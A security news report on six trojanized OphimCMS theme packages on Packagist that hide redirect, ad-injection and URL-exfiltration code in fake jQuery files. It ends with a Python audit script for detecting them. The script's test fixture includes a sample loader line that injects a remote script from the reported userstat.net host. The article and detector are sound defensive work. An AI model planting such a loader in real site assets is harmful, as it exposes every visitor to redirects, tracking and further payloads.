The Packagist page for ophimcms/theme-dy
Cybersecurity investigators at Socket’s Threat Research Team have sounded the alarm after discovering a cluster of malicious packages targeting the Vietnamese streaming community. The threat involves six compromised packages published under the ophimcms namespace on Packagist, the primary repository for Composer, PHP’s package manager.
The attackers are leveraging the popularity of OphimCMS, a Laravel-based content management system used extensively for movie streaming sites in Vietnam, to trick developers into installing trojanized themes.
The malicious packages are designed to look identical to legitimate themes, mimicking the naming conventions of the real platform to blend in. However, hidden within these themes are trojanized JavaScript assets, often disguised as standard jQuery libraries.
As the researchers at Socket explained:
“The packages mimic the naming conventions of OphimCMS… to appear as legitimate themes for the platform. All six ship trojanized JavaScript assets, primarily disguised as legitimate jQuery libraries”.
Once a streaming site administrator installs one of these themes, every visitor to that site becomes a potential target for a multi-stage infection chain.
The most severe versions of the malware load a second-stage payload from infrastructure operated by FUNNULL Technology Inc. Based in the Philippines, FUNNULL was sanctioned by the U.S. Department of the Treasury (OFAC) in May 2025 for its role in facilitating over $200 million in cryptocurrency investment scams.
When a user visits an infected movie site on a mobile device, the malware triggers a redirect to gambling platforms or adult content sites. Beyond these redirects, the malicious code can also:
- Exfiltrate URLs: Send the visitor’s browsing history to the userstat[.]net domain.
- Inject Ads: Force unauthorized advertisements onto the streaming page.
- Hijack Clicks: Redirect a user’s clicks to unintended destinations.
“The JavaScript payloads execute client-side in the visitor’s browser, so the server hosting the application is not directly compromised, but every user who loads the affected theme is affected”.
At the time of analysis, the six malicious packages—including theme-dy, theme-01, and theme-02—had recorded approximately 2,750 total installs. While the redirect chain to gambling sites is primarily restricted to mobile devices in Chinese timezones, the ad injection and click-hijacking components affect all visitors regardless of their location.
Socket has already submitted takedown requests to the Packagist security team, but administrators of movie streaming sites must remain vigilant.
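One concrete check a site administrator can run is below. It is an added example, not code from Socket or OphimCMS: it reads a project's composer.lock for the three package names the report lists (the report says six exist in total) and scans bundled theme scripts for hosts outside an allowlist, flagging the userstat[.]net domain named above. The allowlist and the composer.lock and script contents are constructed fixtures.

```python
"""Audit a Composer project for the ophimcms theme packages named in the report
and for bundled JavaScript that calls out to hosts outside an allowlist.
Added example, not Socket's or OphimCMS's code. Package names and the
userstat[.]net host come from the report; the fixtures below are constructed."""
import json
import re

# Only the three package names the report lists; it says six exist in total.
REPORTED_PACKAGES = {"ophimcms/theme-dy", "ophimcms/theme-01", "ophimcms/theme-02"}
# Hosts a theme's scripts may legitimately reach (assumption: a site-specific list).
ALLOWED_HOSTS = {"code.jquery.com", "cdn.jsdelivr.net"}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def flagged_packages(lock_json):
    """Return installed package names that appear in the report's package list."""
    lock = json.loads(lock_json)
    names = [p["name"] for p in lock.get("packages", []) + lock.get("packages-dev", [])]
    return sorted(n for n in names if n in REPORTED_PACKAGES)


def external_hosts(js_source, allowed=ALLOWED_HOSTS):
    """Return hosts referenced by a script that are not on the allowlist."""
    hosts = {m.group(1).lower() for m in HOST_RE.finditer(js_source)}
    return sorted(h for h in hosts if h not in allowed)


def audit(lock_json, assets):
    """Run both checks; assets maps a file path to that file's contents."""
    findings = {"packages": flagged_packages(lock_json), "assets": {}}
    for path, src in assets.items():
        hosts = external_hosts(src)
        if hosts:  # a "jQuery" file that loads a remote script is the reported pattern
            findings["assets"][path] = hosts
    return findings


# Constructed fixtures, not real package contents.
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "laravel/framework", "version": "10.0.0"},
    {"name": "ophimcms/theme-dy", "version": "1.0.0"},
]})
SAMPLE_ASSETS = {
    "public/themes/dy/js/jquery.min.js":
        '/*! jQuery v3.6.0 */\nvar s=document.createElement("script");'
        's.src="https://userstat.net/s.js";document.head.appendChild(s);',
    "public/themes/dy/js/app.js":
        'import("https://cdn.jsdelivr.net/npm/swiper@8/swiper-bundle.min.js");',
}

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_LOCK, SAMPLE_ASSETS), indent=2))
```

A clean run reports an empty package list and no flagged assets; a hit on either check is a reason to compare the theme's JavaScript against the upstream jQuery release rather than trust the file name.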